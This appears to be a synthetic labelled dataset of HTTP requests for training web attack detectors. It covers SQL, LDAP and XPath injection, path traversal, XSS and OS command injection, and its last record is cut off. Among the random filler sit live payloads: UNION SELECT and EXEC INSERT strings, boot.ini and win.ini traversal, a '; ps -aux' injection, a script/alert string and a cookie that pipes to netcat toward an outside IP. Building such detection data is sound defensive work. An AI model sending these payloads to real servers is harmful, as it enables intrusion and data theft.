GET /aDrlkKCtzUbs/xenmrYitelarcnin/aBRHDBQJzg.php?Hbm=27559232&0csyAomsr=hly2&ve=rheuOEs&Ioegenisll=+dveHteht%3BNhws1s%407%3Fs&XZQftp_4=6uenb3Sahuwkr&C62FSM=6cnncectrn18l&mntjmoodiataue=tdo&iwanne=aliuzrlqThnzNvc&tlz=66354579 HTTP/1.1
Host: www.tts9s5tTi.com
Connection: toh6vled
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-age=271
Client-ip: 115.213.51.204
Cookie: iR=linklink u;RvbscriptD2z4AWIsB=|  /usr/bin/nc    -vvv 201.22.100.100 80%00
Cookie2: $Version="72"
Date: Mon, 06 Feb 06 11:24:05 GMT
ETag: W/"EYZzf1TmNC8fhUKlxiC"
Expect: 100-continue
From: ajo2eno@Il3E87.biz
If-Modified-Since: Sat, 17 Jan 09 08:04:10 CET
If-Unmodified-Since: Sun, 10 Dec 06 20:02:26 UTC
If-Match: "1IHT1N9bRUeKEUH-_"
If-None-Match: "BPSC.0qPUAmty7Tpr"
If-Range: Thu, 13 Nov 08 16:05:00 UTC
Max-Forwards: 9
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic aWl3dDp5aWNidHQ=
Authorization: 3uhnad rahrne=3torltij
Range: 015-2505
Referer: http://Oaomedee.gov/iwct/eitgth.fgf
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/0.8 (Machintosh; U; PPC 2.0; 8a-dt; rv:7.0.4) Gecko/27958543
UA-CPU: StrongARM
UA-Disp: 9659,2069,32
UA-OS: Windows 98
UA-Color: color16
Via: HTTP/4.5 www.ssmE.png:2054
Transfer-Encoding: gzip
Upgrade: 6tes/6.0, eset/0.0
Warning: 430 www.ooy4teh.gif "nn6ltSh" "Wed, 15 Nov 06 17:03:14 GMT"
X-Forwarded-For: 5.63.56.150
X-Serial-Number: 481448
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 42969
Start - Id: 42484
class: SqlInjection
GET /nCB./xn.js?ewnktd=caiOnf&euUn=%27%29%2F**%2FUNIONALL%2F**%2FSELECT%2F**%2F72247%2F**%2FFROM%2F**%2FIwi4u4d%2F**%2FWHERE%2F**%2F%28+%27%27++%3D+++%27%2F**%2F HTTP/1.1
Host: www.Qetjas.org
Connection: close
Accept: video/quicktime;q=0.5, application/*
Accept-Charset: cp-936, euc-cn;q=0.3, koi8-r;q=0.7, euc-tw, x-mac-korean;q=0.1
Accept-Encoding: *
Accept-Language: Csmat-k0opti, ETueu-icr0a4e, igvmcn3-le;q=0.0, CmaetnhW-7NAmltke, dkzn-seoe
Cache-Control: min-fresh=4756
Client-ip: 89.45.12.136
Cookie: n2vns=rm7UVrAcosh7bpiu@=8;ut7inonayrnt=rpiqYZthw;kmSw56r=82785;bwiwLonatO=6180
Cookie2: $Version="2"
Date: Thu, 22 Dec 05 01:16:11 UTC
ETag: W/"yIy09km3OC5eA@3"
Expect: 100-continue
From: sheo@RafNi.uk
If-Modified-Since: Wed, 11 Jun 08 13:06:56 UTC
If-Unmodified-Since: Tue, 06 Sep 05 14:11:54 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: tnrr qtclsQSi=e3eg
Authorization: emmed 32haU8=slot
Range: 7-59040
Referer: /Toloenny.msf
TE: trailers,chunked;q=0.2
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.5 (Machintosh; U; PPC 4.5; a3-o7; rv:2.3.8) Gecko/65879671
UA-CPU: x86
UA-Disp: 6364,160,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 733x829
Via: 1.6 8.111.68.115, 7.4 www.entImE.css
Transfer-Encoding: gzip
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 899 www.i1dtW1t.js:1401 "nerre4v" "Thu, 17 Mar 05 06:33:46 CET"
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 029543372781579317
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42484
Start - Id: 37614
class: LdapInjection
POST /nardwza/awu7Hrit_5K4OOGty./isaerO/tctuhgvrbmskTg/mailrcp/ewymrrw/hasccthI9bro/sF_.bin? HTTP/1.0
Content-Length: 187
Content-Language: aeaesfMi
Content-Encoding: deflate
Content-Location: http://www.i5o8d.cz/r6n0n/dqtdhosa/sc0r.php4
Content-MD5: b3N0YXlSZWh0aWZBbksycw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 02 May 05 02:25:46 GMT
Last-Modified: Thu, 22 Apr 04 01:44:42 CET
Host: www.eeylwahnfm.it
Connection: keep-alive
Accept: video/*, image/*, image/jpeg
Accept-Charset: iso-8859-9, iso-8859-8;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 34.23.57.157
Cookie: nCtfOoEaLifee=741;lp=2
Cookie2: $Version="61"
Date: Sun, 01 Aug 04 11:33:37 UTC
ETag: "6t0u8o_yH@NZvJitW"
Expect: 100-continue
From: tiwatv@kDh9.de
If-Modified-Since: Wed, 18 Aug 04 15:21:39 GMT
If-Unmodified-Since: Fri, 30 Mar 07 15:18:20 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 08 Apr 10 19:37:53 UTC
Max-Forwards: 92
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Digest username="pitaah"
Authorization: 9zero hxpb=aiseetc
Range: 9-3321,97916-131
Referer: /o5ett/bveca/onDenl/nhscirh/puy0lnd.msf
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/7.6 (Windows; U; Win98 8.9; ae-on; rv:2.3.9) Gecko/34510912
UA-CPU: PowerPC
UA-Disp: 2548,1743,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 770x317
Via: 0.9 68.127.98.228, pSlge/6.8 www.makIEa.css, 3.9 www.nsaieape.png:1603
Transfer-Encoding: deflate
Upgrade: qfrm/0.2, RK4ebu/9.9
Warning: 019 53.184.51.92 "gqnaoerdito" 
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 220877773
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

.documentRp5r=)(    |   (0av=vdeh*)&7ioirriesfmsn=alwTpoetGe&7rAt=l4binclude&0NebphpIFxq-=eareuff&_4KQPs=02924291&rAxlP3sock_streamLxetc9=t]u0Siofao&o4nhe=FIeS &kdbiyn=93303

End - Id: 37614
Start - Id: 38361
class: LdapInjection
GET /9XT0ovAhHm/ctalwErhwEog9eijsm/lFjgaqisN7dM/UZnullOimgo2MGperllog/f@WgZ73X-p@nPqw/aqmriqoiepncsnNlO/yTbaetghopre/fQnP64PDIb-6rKG69Y/lwuaeseNi/oqZwcdLbFXsqMLmxZRXH/eJ0SpcmqGNs_bk6ZGk/vsAunFRHbq9n2PgCwm.asp?agegCob=753&0IG5Ysw=6324&wfelim=pedleEtncay5&aineoyrt=%29+%28+++%7C%28wHtr%3DoeIez*%29&VYdTdQHDe=pwBIec&45boot.iniOttNftp=7115176878&ekop7d=4Cjn%5D&xml0zps=02667541&eiobhdsG4wET=934678615&7d_mWOO3KlogpsM=087105874&yzwriolpvi=+h3tem&ssmmtroiBych=0sw%3EIeiwuhomenit HTTP/1.0
Host: www.uNx2ej.uk
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: ees-dFoThto;q=0.2, oa4u1ss-t;q=0.1, wyahird-o, j3dpori-o5osnsu
Cache-Control: min-fresh=06409
Client-ip: 193.201.183.61
Cookie: eo=andrslc
Cookie2: $Version="245"
Date: Sat, 01 Oct 05 15:12:17 GMT
ETag: "hV-qto-LnVx2CyqW"
Expect: 100-continue
From: sss8tel@Dttyhoedag.be
If-Modified-Since: Tue, 18 Aug 09 02:15:53 UTC
If-Unmodified-Since: Fri, 18 Apr 08 01:15:49 UTC
If-Match: *
If-None-Match: "HbtqXj6WcyzMzv2yFft0"
If-Range: Sun, 22 Nov 09 13:30:11 CET
Max-Forwards: 05
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="epfYqHet"
Authorization: Digest uri=/rryrfae/azuenL/tsor.pdf
Range: 84-89,256260-35,5-
Referer: http://lsm3h.net/oion/b4eaa/W2esrif/neletSe.php4
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.4 (Machintosh; U; Mac OS X 0.0; c7-ub; rv:4.4.3) Gecko/12751262
UA-CPU: 68000
UA-Disp: 854,896,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 231x314
Via: 7.2 115.92.196.7:1, 6.5 www.earnczr4.html
Transfer-Encoding: compress
Upgrade: Mso/2.1, 5stNn/1.9, etusna/2.9, fettee/0.9, 7agirn/3.3
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 9579642646846
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38361
Start - Id: 41742
class: SqlInjection
GET /sluoeu0har/8tN/hx.aN29Wxh5W2dA@Pwyo/cincludevR9vuPXD.css?MiabIphLlot=5o&0noi=Oaear6orvr45E&rpt0eS=%3Enta%7C&zwrlxcxraOnn=a+i&ltsr=processing-instruction%5Dv&04CotpCwCl=010&nsMj1rdkaz6g=%28%40+p5ypasswd&eem=chairs%27+++UNION++SELECT+hhoe+FROM+++dba_users+++++WHERE+++++name+++like++++%27%2525&KEei=eONn&BG1allNkSiXT_=eh-acIioMr&al3lcesexuuc=p_yy_Cx HTTP/1.1
Host: www.dhj83ot.uk
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.2
Accept-Language: aeiomitp-o;q=0.6, 8lSOpm5i-nss, esw-cAdid
Cache-Control: max-age=14
Client-ip: 136.31.14.94
Cookie: bea=15
Cookie2: $Version="085"
Date: Thu, 23 Mar 06 15:36:45 UTC
ETag: "3RzLyYlW.gVQq0ScRi"
Expect: 100-continue
From: AEeu@io5oeTS.be
If-Modified-Since: Thu, 23 Jun 05 17:50:39 CET
If-Unmodified-Since: Thu, 15 Feb 07 05:30:17 UTC
If-Match: "-Ls_agbPEl6Cu_f1aFi"
If-None-Match: "Qb3J5Ez19jpJNWFv2K"
If-Range: Thu, 21 Jul 05 08:40:36 UTC
Max-Forwards: 7
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic cmllaHR0YnQ6dHJlMg==
Authorization: Digest opaque="ciu9uft"
Range: -9158,6593-962,-115779
Referer: /tueino/ljc1ns1.png
TE: chunked;q=0.4,trailers
Trailer: Trailer
User-Agent: Mozilla/5.4 (Machintosh; U; Mac OS X 6.6; qx-hi; rv:4.8.8) Gecko/83334342
UA-CPU: 68000
UA-Disp: 570,952,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8130x9539
Via: FTP/9.8 29.30.180.183
Transfer-Encoding: compress
Upgrade: mer/2.9, hitWop/2.4, vtjw/1.7, otte/3.2
Warning: 295 32.227.178.22 "oatocencd" 
X-Forwarded-For: 208.165.185.87
X-Serial-Number: 81915611891
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41742
Start - Id: 45935
class: PathTransversal
GET /i1MJaG1zLuG/sssYw/ebl@Tdgtoc8WeWNq9/rTbhs2/ilW5E1-AY2rvU/tubaeUbtkyCgon/u6vDip/ilFUHBcS/sgisanaibuxe1ecn/jttatoyazdo.html?tsnnitdw=o.F3641X6&hbdanoh=p%3A%5Cwindows%5Cboot.ini&t2bewiEcun=anseogsg+Emgroup+byN&nshisolbri=%5Cdeletewhm+pr&ja0tmsEawtBioeO=uaylmqqiIh&aas=swdeletei&I4Kftpm2=138870455&t1uois=930&5lgQytnhii=6704061&iNgSaa3tnsleS9e=26950078&Bik9SidUSp9=h&e3utq9fw=a%27fo&tTo=d%7Eo&lnaiar=+T HTTP/1.1
Host: www.rtBTeAia.st
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: deflate
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 97.149.89.41
Cookie: autoexec4-LjxkMg=1@u59g5;atp0csbsitoc=l-RB@Od;ea=ufCecoqus3anze;Ti=97;o0oes=0;ft.ftp4U0az5=3120523
Cookie2: $Version="385"
Date: Thu, 22 Dec 05 21:39:22 CET
ETag: W/"ur2DNWLm99fcidgU4"
Expect: exbam=LrtehsF
From: ba5dren@nteitjeEal.cz
If-Modified-Since: Tue, 17 Nov 09 06:32:44 CET
If-Unmodified-Since: Thu, 01 Apr 04 04:52:07 UTC
If-Match: "fm23g2-AwpNTYH5D04"
If-None-Match: "6dypoharvRJ@.WuDppP"
Max-Forwards: 7656
MIME-Version: 2.6
Pragma: oahN7ly=f
Proxy-Authorization: atacrJ nOIndN=dosn6sfe
Authorization: Hh8ljl hkHpI=asiyO
Referer: /m0lds/tmirsj/qdlnso/fR9nl6ah.cfm
User-Agent: sIH37nZC http://www.aRef.biz
UA-Disp: 3135,8994,8
UA-OS: FreeBSD
Via: HTTP/1.3 174.175.247.217, 7.9 www.vVPeiaE.tiff, ezqew/1.1 www.f8fbaind.shtml:33
Transfer-Encoding: telre
Upgrade: nstsgn/3.1
Warning: 301 www.foehiLHu.gif "dqnsc" 
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45935
Start - Id: 38161
class: LdapInjection
GET /ennor9tnl8nAgso/nooh/nEC0ciihs8fLt.gif?optJGwuy8=175223&8an=aeeid0e7d4cum&oaeNAemsh1n=rnR&uuleufaeie=%29+++%28+%7C++%28e6%3Dnns*%29&ry=6381351519&Av1w2es=bkTd6olkc&y34Ssldea=8&segt=4675837258&it5odiin87ebi=42&utnwUAL0pnMhoe=349&edqIuioj=48sg63HGN&Janta=lE4&cp=45&eaeoiibchpfs=55214888 HTTP/1.0
Host: 190.66.94.37
Connection: lacyeii
Accept: */*
Accept-Charset: euc-cn;q=0.6, cp-950;q=0.5, euc-jp, iso-8859-4
Accept-Encoding: *
Accept-Language: vuder0-e7;q=0.0
Cache-Control: max-stale
Client-ip: 246.213.85.96
Cookie: maaBe=0547;nl=863688965;eIeOcuehdetaged=e
Cookie2: $Version="4"
Date: Wed, 20 Aug 08 01:39:07 GMT
ETag: W/"oYZOAXe-lop@UENF"
Expect: 100-continue
From: 7enqeIo@sjtoi.net
If-Modified-Since: Sun, 04 Apr 10 11:00:57 CET
If-Unmodified-Since: Thu, 10 Feb 05 18:33:11 CET
If-Match: "1Ouy9-@oIfwoxEs"
If-None-Match: *
If-Range: "2i5QJJUIfDOj0yMha@Ne"
Max-Forwards: 1916
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: vanc 8esln=eenorc9
Authorization: njtdo oiaHAsOe=InaIstei
Range: 8-,-63
Referer: http://www.aru1aol.biz/has0.mp3
TE: deflate
Trailer: Proxy-Authorization
User-Agent: ofc5a5p9lna
UA-CPU: PowerPC
UA-Disp: 311,524,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 550x1014
Via: 8.3 www.p0rem.js, 6.7 www.reeecvIe.gif, HTTP/5.7 www.15nf.png:5020
Transfer-Encoding: sctr
Upgrade: eeu/8.8, fSe7/3.7, nho/6.1, rqw/6.3, SLsti/8.0
Warning: 607 www.RgHm.tiff "solih9ny" 
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38161
Start - Id: 37393
class: LdapInjection
GET /ftcsl7nppelr/n3artenid/eele/80yHGexPUE/eMz65Lg5gCWMj/sYZ3v0/h_TFGksuCt_NZG/hthia/Md.css?access_log-vbscriptUzzlogxZ9w4=26647087&6veea3rF=juAXcmoY HTTP/1.1
Host: 45.196.65.211
Connection: liao0fn
Accept: */*
Accept-Charset: iso-2022-jp
Accept-Encoding: compress, deflate;q=0.8, identity;q=0.6, gzip, deflate
Accept-Language: h-esRnm;q=0.9, asynna-sciE;q=0.8, eeasL-oe
Cache-Control: no-cache
Cookie: gjted43s2au5hO=hiOMajVoK-;dg=01;kria=cEWqxi1;Tm1csamCOVP=mm2oat;-S0yhFnQ=428775990
Cookie2: $Version="823"
Date: Tue, 15 Jan 08 08:54:29 UTC
ETag: "blhGVaP7qA3OySyl"
If-Modified-Since: Mon, 27 Jun 05 02:15:10 CET
If-Match: *
If-None-Match: "vfypi7bvYVM08aSpa"
Max-Forwards: 192
Pragma: Dy0='n'
Referer: /nanjnat/nbscrl6o/a4ymeodx.bin
Trailer: From
User-Agent: 70)(&(objectClass=foT)(|(sn=neh)(cn=tsk    J*))
Upgrade: iaz/0.5, Ibd3an/1.5

null

End - Id: 37393
Start - Id: 42626
class: SqlInjection
GET /ie/eUYcChNuy/AhgteoEodAsie2udo/oNolsue/n3UQoNz3.php?mshaOSdmw=%3B+EXEC%28++++%27INS%27%2B%27ERT+++++INTO++++users++values%2834%2C%27g1o1ajhEmh%27%2C%27rpttezrt%27+%29%29&Kaccess_logNypFCuC=gehx18mU6vtCjreai&tnsaeonn3efmei=aLX&iRsFIRibsm0A=oa68c HTTP/1.0
Host: 40.245.36.31
Connection: close
Accept: */*
Accept-Charset: iso-8859-8-i;q=0.7, windows-874, iso-8859-5;q=0.3, x-mac-chinesesimp;q=0.3, windows-1250
Accept-Encoding: compress, gzip
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 186.220.126.30
Cookie: KTddmd=(|CeinserthgdRandwn;ao=lmochatmp>2;cJLUz=nkS/nodeswftpRbn;rcOe1rt= a3A jebody;bg=06932
Cookie2: $Version="78"
Date: Sat, 20 Oct 07 20:12:14 UTC
ETag: W/"6g2CgBxyxaxVfRuImC"
Expect: 100-continue
From: ik3a@umddedDee.biz
If-Modified-Since: Sat, 05 Apr 08 24:45:00 CET
If-Unmodified-Since: Wed, 04 Jan 06 03:04:42 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 12 Jun 05 23:28:37 CET
Max-Forwards: 5
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: Saen 6ahrcn=dstav
Authorization: edese aorgt=egda
Range: 72326-9838
Referer: http://www.sstuohI.gov/bTsee/8enh.mpeg
TE: deflate,trailers
Trailer: Cache-Control
User-Agent: Hmrp0sz6f
UA-CPU: x86
UA-Disp: 4133,8176,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4720x346
Via: FTP/6.3 136.250.185.180:6, Anet/7.0 179.10.197.170
Transfer-Encoding: gzip
Upgrade: tTeemn/3.0, mb5/6.3, ezf/4.1
Warning: 746 125.14.120.8 "Ooss" 
X-Forwarded-For: 32.163.55.249
X-Serial-Number: 8496085011716773
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42626
Start - Id: 49489
class: XPathInjection
GET /dS-cvlkPY_2KU/rVSYUN8b8VdiCa/NiDpt4IxOl-YWk/lwdJSOMNP0swrZ_b_xQ-/h33@RQ9/2script/mZKhbCD90Sr/nacetyaofsohohvc/ybgVkgvC6D.Y6vb9Y7/iwreIhoenm/cF@_ozzg95/uacethnp9eesfeol.gif?dpa19stvar=5sdeC%27+++++or+count%28+++path%2Fchild%3A%3Anode%28%29%5Bposition%28++%29%3D%28%28i+%2B+++j+++%2Bk+++%2Bl++%2B++++1%29%5D++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or+%27cyd%27++%3D%27+eabtUhh%27++++or HTTP/1.0
Host: www.Yaei2Yn6dI.uk
Connection: close
Accept: video/*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-age=7790
Client-ip: 243.204.148.120
Cookie: bnn=a;XLTZUk=rsevniTTa4ue;nhsOasDsmote=a@o;u2dPROeysf=tli0X6lotOney;uunejunyn=Wnwsaileiewd7fs;.MHe@delete=dussgjrnClr
Cookie2: $Version="467"
Date: Thu, 12 May 05 17:12:04 UTC
ETag: W/"8WDs@-d9IdX423MDOwo"
Expect: zimlrze=7x4eo
From: sryguohs@efdmr.biz
If-Modified-Since: Mon, 30 Nov 09 22:46:00 GMT
If-Unmodified-Since: Sun, 16 Jan 05 16:32:22 GMT
If-Match: "0X.yeUKlGwFJoKNR1t"
If-None-Match: "WUznIkBAx-Ym0liD6wgx"
If-Range: *
Max-Forwards: 36
MIME-Version: 4.4
Pragma: das2eea='eht'
Proxy-Authorization: NTLM bGlvb2Vzc2Flc3Rvb3Flb3Rvcm5zZTRqZXhpc2hsZGliaXVhZ2h0aQ==
Authorization: NTLM Y0llbXRldEpvem1nMHRhYXFoZTdIc3hwYWd6ZXd1dzFzb2lzb3RzRQ==
Range: -012
Referer: /etsh/0hno.tiff
TE: trailers,chunked,trailers
Trailer: Authorization
User-Agent: s5hsglnEho http://www.mlt2.com
UA-CPU: Sparc
UA-Disp: 4263,349,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 527x1451
Via: FTP/6.6 221.185.154.74, HTTP/2.7 46.208.240.221
Transfer-Encoding: deflate
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 029 152.191.219.235 "iowd" 
X-Forwarded-For: 206.176.73.188
X-Serial-Number: 201583507
----: --------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49489
Start - Id: 36015
class: PathTransversal
GET /Daiitt4somA/k@9Y2OlU41binPC/quL--/Q_ElL6unionU/o7gEcLkjKCCImC/iesotehlvr7p3u0r/sPQW3m.swf?eel=9gSyLoenEayw1eo&iias=hadek&iiluh3=e%3A%5C%5CWINNT%5C%5Cwin.ini&ndaddmouyTes=aoae HTTP/1.1
Host: 130.95.7.26
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: i-ht;q=0.8, a-yrJz, xotpcrfd-odue;q=0.5, aswvsrei-elnenzu, nryae0-tmc2d
Cache-Control: no-store
Cookie: rbxepnbztteeee=0hehmwriVe6aHi;jaajAeEl=9855173220;yehniun=s;InupdatekliZd1XeK=ro 1;gyne=hAh6Ssp;eat=3kt
Date: Thu, 19 Oct 06 05:52:44 GMT
If-Unmodified-Since: Tue, 18 Oct 05 23:42:42 CET
If-Match: "ZPtO1cqkTg7t6kZP"
If-None-Match: "YA_jmNluCP2jXlwf"
Max-Forwards: 63
MIME-Version: 9.9
Proxy-Authorization: NTLM bmFiRXRsbmlnZXplYWxzTml1bWVlYWVyYWFzdHNkZDh4YTE0bmo=
Authorization: tbnei oiec=eotufe
Referer: /reex/1st61ua/rtridke/amrSor.rar
TE: trailers,trailers
Trailer: Host
User-Agent: mIfi9jetM (lcMk69vR; doCSXwE; ityP7mB2ki; iHznTO; sk1T3xsv_)
Via: 8.3 www.Agnadl.tiff
Warning: 902 48.219.54.198 "etIGqadina5ca" 
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36015
Start - Id: 46779
class: XSS
PUT /es-Fs9.dll? HTTP/1.0
Content-Length: 395
Content-Language: n,2suumG,46hnw
Content-Encoding: gzip
Content-Location: /grreprit/o1htaE/nlRm0.jsp
Content-MD5: c0ZkaVBlYW8waGF3cHRTZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 17 Jun 05 04:04:22 UTC
Last-Modified: Thu, 08 Mar 07 09:04:57 GMT
Host: www.irth.ch
Connection: close
Accept: text/*
Accept-Charset: iso-2022-jp, us-ascii, x-mac-hebrew;q=0.2, cp-932;q=0.7
Accept-Encoding: *
Accept-Language: ts-Enr, qm-temInaah;q=0.1
Cache-Control: no-store
Client-ip: 76.116.125.91
Cookie: lIuP=3@V4Eu;oExomF2rmeO6mlr=t| 75a9reH|eiO@;gnWuAg=f=);iuyiSmbTl=2d7varw689tphpWconnecteod;
Cookie2: $Version="216"
Date: Tue, 16 Jan 07 23:25:50 CET
ETag: W/"Ufr4QY4Us830CuN9T"
Expect: pnwtm=hnizs
From: dyenT@gpt6glsG.cz
If-Modified-Since: Thu, 14 Aug 08 14:47:28 CET
If-Unmodified-Since: Thu, 05 Apr 07 01:49:49 GMT
If-Match: "CPkEzOXatVZ9gEKcjO"
If-None-Match: "Vt60Asb7ZcDmgpveNk"
If-Range: "QfKIttdW1bIcGTA-4LN"
Max-Forwards: 885
MIME-Version: 7.2
Pragma: tAZewos='lstla'
Proxy-Authorization: sdnda be5npAfd=Esnrrha
Authorization: Basic M01xc1NyaTp0ZHJz
Range: 462-
Referer: /ftae/tsanLlhh/hqjsoieT.msf
TE: gzip;q=0.4,chunked,trailers
Trailer: Trailer
User-Agent: upEoestasm7e
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 1199x1516
Via: 4.2 95.239.189.82, eneyo/9.0 181.234.52.117
Transfer-Encoding: deflate
Upgrade: ggs4o/0.2, ohoge/3.3, yemtX/6.0, tweoe/2.9, anym/6.6
Warning: 061 205.79.84.252 "trdaeY" "Tue, 09 Nov 04 20:27:34 CET"
X-Forwarded-For: 124.216.57.225
X-Serial-Number: 80684101
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

mgpgexntati=mht&3zviyrfwrissqs=jifs+&sam0t74phpR_=033801&onodNntaapgCcr=N=eoeT lyeh&tear=86401847&@C0htpass=Er4RR&nhes5amIitee=7h&Mu=a'&RsdgndVow=[\xC0][\xBC]script>[alert  ('drORsfsrta');][\xC0][\xBC]/script   >&02oh3iAAm=14138&ethcd=pfn%[w&7Dkdropphp7izmQI_=ect0olc0&ln=feru&mA6sxsaioth=e27sIoxrr&ReferspalpDrsto= rnonhpasswds<Nhdzidean4

End - Id: 46779
Start - Id: 36785
class: OsCommanding
GET /caXyVOvFvmZt0cuAUQ.aspx?netymob9esjd=eau&titI=05&ePw=%27+%3B+++ps++++-aux%3B HTTP/1.0
Host: 237.226.72.203
Connection: close
Accept: video/*, application/*;q=0.1
Accept-Charset: koi8
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 183.149.193.186
Cookie: pis4bedhoa=eezeonihhtaccesO;di=loegtu)Cre|n;noeOw=853;yecLrE=eqr
Cookie2: $Version="28"
Date: Mon, 21 Aug 06 22:25:29 CET
ETag: W/"WNaw5RqhVgLPmf0nz7aY"
Expect: tYl5irs
From: RdaleTeo@igeTtd.be
If-Modified-Since: Thu, 04 Jun 09 04:05:05 CET
If-Unmodified-Since: Wed, 20 May 09 10:06:39 UTC
If-Match: *
If-None-Match: "5tXW7h-y4n-EPYhqo."
If-Range: "yb-DI510qaPi.D_Vz"
Max-Forwards: 44
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM NWl0Y25pb3Jha096ZWhmZXBzbmxoZW1LbTdlb25zaDJDdDVubnRib3RuaHNlZg==
Authorization: citeml sTeoegdo=Daea
Range: 907-5,-807
Referer: http://www.6nEge3i.ch/ni8oaZi/nyoS/ecYooo.gif
TE: trailers,gzip;q=0.4
Trailer: If-None-Match
User-Agent: Mozilla/2.1 (Machintosh; U; PPC 4.0; es-ht; rv:1.8.7) Gecko/68932952
UA-CPU: MIPS
UA-Disp: 9579,9287,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 232x1783
Via: FTP/9.8 212.141.128.165, 0.0 www.rtqny.html
Transfer-Encoding: gzip
Upgrade: lNc/6.5, 7nli6/7.0
Warning: 069 241.153.203.196 "ds96bdaie" "Mon, 05 May 08 12:27:37 UTC"
X-Forwarded-For: 5.176.183.129
X-Serial-Number: 51873709956197
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36785
Start - Id: 43065
class: OsCommanding
PUT /Jwform/tnPtmmtOnsoNOrm/isdadsa/w4j/eo3HYA4Y8Dv/aemh/sxin0nH/grpRLYBugJA/itsLnu/Lfaainm/gor5lhicuymjbba.cgi? HTTP/1.0
Content-Length: 196
Content-Language: aae,5omch
Content-Encoding: compress
Content-Location: http://www.taaj3.biz/otng/ateGa/synyrrgw.sh
Content-MD5: aTdlYWVhUG1oM2NuZURuSA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 06 Oct 08 21:59:43 GMT
Last-Modified: Thu, 08 Jun 06 17:30:51 CET
Host: www.llCgh9h.it
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: deflate, gzip;q=0.5, deflate
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 38.62.165.132
Cookie: e6oyoKAnw2c=it5nshutdown=oM;qiLTyKfNaZkI=420907
Cookie2: $Version="48"
Date: Sun, 10 Dec 06 12:38:26 UTC
ETag: W/"QXl@Wqluj0HKLJ.8Ikl"
Expect: ni1y
From: sTleEdu@dtAttFd.de
If-Modified-Since: Sat, 20 Nov 04 01:53:46 UTC
If-Unmodified-Since: Tue, 08 May 07 04:09:25 CET
If-Match: "6a@Cdu7EoW85L7u"
If-None-Match: *
If-Range: Thu, 18 Sep 08 08:59:25 CET
Max-Forwards: 4
MIME-Version: 7.0
Pragma: i0nedc5='eiy'
Proxy-Authorization: wswe njne=Ot3enhto
Authorization: Digest username="4sya7ti"
Range: -86761,779-
Referer: /layt.png
TE: trailers
Trailer: Accept
